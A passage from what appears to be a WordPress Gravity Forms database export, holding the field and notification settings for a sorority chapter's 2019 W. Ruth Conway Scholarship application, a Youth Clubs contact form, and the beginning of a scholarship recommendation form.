Involvement\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"text\",\"id\":9,\"label\":\"Current Unweighted GPA\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":26,\"label\":\"Anticipated\\/current major of study\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":12,\"label\":\"Number of college credit hours completed (Type NA if you are a high school applicant)\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":14,\"label\":\"Do you hold membership in any academic clubs\\/organizations? If so, provide the name of the clubs\\/organizations, years of membership, and positions held for each club\\/organization.\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":13,\"label\":\"What academic awards or honors have you received? Provide the name of the award or honor and the year received.\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":36,\"label\":\"List all community service involvement or activities. Provide the name of the organization, activity, and dates of service.\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":37,\"label\":\"Please provide your top college choices.\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"section\",\"id\":16,\"label\":\"Scholarship Essay\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":6,\"description\":\"Select one of the four available essay questions. Your essay should be 500 words or less, well-written, and typed. Be sure to include the essay prompt in your submission.\\n\\nWe strongly encourage you to proof read prior to submission. Check for grammar, punctuation, homophones, and other simple edits.  The prompt and other formatting are not included in the word count.\\n\\n \\n\\n\\n\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"textarea\",\"id\":38,\"label\":\"\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"Essay A. In her book Hidden Figures: The American Dream and the Untold Story of the Black Women Mathematicians Who Helped Win the Space Race, author Margo Lee Shetterly documents the historical contributions of four black women mathematicians at NASA from the 1930-1960s. Pretend you are the hidden figure, what will be your contribution either to your community, your chosen profession, etc.? How will a college education allow you to make such a contribution?\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1},{\"type\":\"textarea\",\"id\":39,\"label\":\"\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"Essay B. You are a contestant on the game show, \\u2018Jeopardy.\\u2019 If you could choose your category, what would it be and why? How and why have you become passionate\\/knowledgeable about your category?\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1},{\"type\":\"textarea\",\"id\":40,\"label\":\"\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"Essay C. In the movie Avengers: The End Game, the Avengers must defeat Thanos the evil demigod. What societal issue(s) do you most want to defeat (or help address) and how might a college education best equip you to engage in the issue(s)?\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1},{\"type\":\"textarea\",\"id\":41,\"label\":\"\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"Essay D. In the children\\u2019s book Curious George, George the chimp learns about the world around him by exploring new adventures. About what are you most curious and how might a college education set you on a course to new adventures to satisfy your curiosities?\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1},{\"type\":\"fileupload\",\"id\":35,\"label\":\"File\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"maxFileSize\":\"\",\"maxFiles\":\"\",\"multipleFiles\":false,\"allowedExtensions\":\"pdf, doc, docx\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1,\"displayOnly\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"section\",\"id\":22,\"label\":\"Unofficial Transcript\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":6,\"description\":\"Upload a copy of your unofficial transcript. An official transcript will be required if awarded a scholarship.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"fileupload\",\"id\":33,\"label\":\"File\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"maxFileSize\":\"\",\"maxFiles\":\"\",\"multipleFiles\":false,\"allowedExtensions\":\"pdf, doc, docx\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1,\"displayOnly\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"section\",\"id\":32,\"label\":\"Lambda Gamma Zeta Release Form\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":6,\"description\":\"The Lambda Gamma Zeta Chapter of Howard County, MD Release Form allows for us to post pictures and provide a bio about you on our social media sites, websites, and promo materials. If you are under 18 a parent\\/guardian\'s signature is required. The form can be found at www.zphiblgz.org\\/scholarship\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"fileupload\",\"id\":34,\"label\":\"File\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"maxFileSize\":\"\",\"maxFiles\":\"\",\"multipleFiles\":false,\"allowedExtensions\":\"pdf, doc, docx\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1,\"displayOnly\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false}],\"version\":\"2.1.2\",\"id\":6,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"subLabelPlacement\":\"below\",\"cssClass\":\"\",\"enableHoneypot\":true,\"enableAnimation\":false,\"save\":{\"enabled\":true,\"button\":{\"type\":\"link\",\"text\":\"Save and Continue Later\"}},\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\"}','','{\"598bedad9a6d9\":{\"id\":\"598bedad9a6d9\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thank you for your 2019 W. Ruth Conway Scholarship application! Print or save this confirmation for your records.\",\"url\":\"\",\"pageId\":0,\"queryString\":\"\",\"disableAutoformat\":false,\"conditionalLogic\":[]},\"sc1598bf02958a80\":{\"id\":\"sc1598bf02958a80\",\"event\":\"form_saved\",\"name\":\"Save and Continue Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Please use the following link to return to your form from any computer. <br \\/> {save_link} <br \\/> This link will expire after 30 days. <br \\/>Enter your email address to send the link by email. <br \\/> {save_email_input}\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"},\"sc2598bf02958b20\":{\"id\":\"sc2598bf02958b20\",\"event\":\"form_save_email_sent\",\"name\":\"Save and Continue Email Sent Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"The link was sent to the following email address: {save_email}\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}}','{\"598bedad76d93\":{\"isActive\":true,\"id\":\"598bedad76d93\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"event\":\"form_submission\",\"to\":\"scholarships@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"Application Submitted {Name (Last):18.6}\",\"message\":\"{all_fields}\",\"from\":\"{Email:6}{admin_email}\",\"fromName\":\"\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":false},\"598bf02957392\":{\"id\":\"598bf02957392\",\"isDefault\":true,\"name\":\"Save and Continue Email\",\"event\":\"form_save_email_requested\",\"toType\":\"hidden\",\"from\":\"{admin_email}\",\"subject\":\"Link to continue {form_title}\",\"message\":\"Thank you for saving {form_title}. Please use the unique link below to return to the form from any computer. <br \\/><br \\/> {save_link} <br \\/><br \\/> Remember that the link will expire after 30 days so please return via the provided link to complete your form submission.\"}}'),(7,'{\"title\":\"Youth Clubs\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"type\":\"name\",\"id\":1,\"label\":\"Name\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"1.2\",\"label\":\"Prefix\",\"name\":\"\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"1.3\",\"label\":\"First\",\"name\":\"\"},{\"id\":\"1.4\",\"label\":\"Middle\",\"name\":\"\",\"isHidden\":true},{\"id\":\"1.6\",\"label\":\"Last\",\"name\":\"\"},{\"id\":\"1.8\",\"label\":\"Suffix\",\"name\":\"\",\"isHidden\":true}],\"formId\":7,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"email\",\"id\":2,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":7,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"emailConfirmEnabled\":false,\"pageNumber\":1,\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"select\",\"id\":3,\"label\":\"Interest\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Pearlette Club\",\"value\":\"Pearlette Club\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Amicette Club\",\"value\":\"Amicette Club\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Archonette Club\",\"value\":\"Archonette Club\",\"isSelected\":false,\"price\":\"\"}],\"formId\":7,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":4,\"label\":\"Message\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":7,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1,\"displayOnly\":\"\"}],\"version\":\"2.1.2\",\"id\":7,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null}',NULL,'{\"59b91d7e34afb\":{\"id\":\"59b91d7e34afb\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}}','{\"59b91d7e2c00a\":{\"isActive\":true,\"id\":\"59b91d7e2c00a\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"event\":\"form_submission\",\"to\":\"youth@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\",\"from\":\"{admin_email}\",\"fromName\":\"\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":false}}'),(8,'{\"title\":\"W. Ruth Conway Scholarship Recommendation Form\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"type\":\"name\",\"id\":1,\"label\":\"Recommender\'s Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"1.2\",\"label\":\"Prefix\",\"name\":\"\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"1.3\",\"label\":\"First\",\"name\":\"\"},{\"id\":\"1.4\",\"label\":\"Middle\",\"name\":\"\",\"isHidden\":true},{\"id\":\"1.6\",\"label\":\"Last\",\"name\":\"\"},{\"id\":\"1.8\",\"label\":\"Suffix\",\"name\":\"\",\"isHidden\":true}],\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":11,\"label\":\"School\\/Organization\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\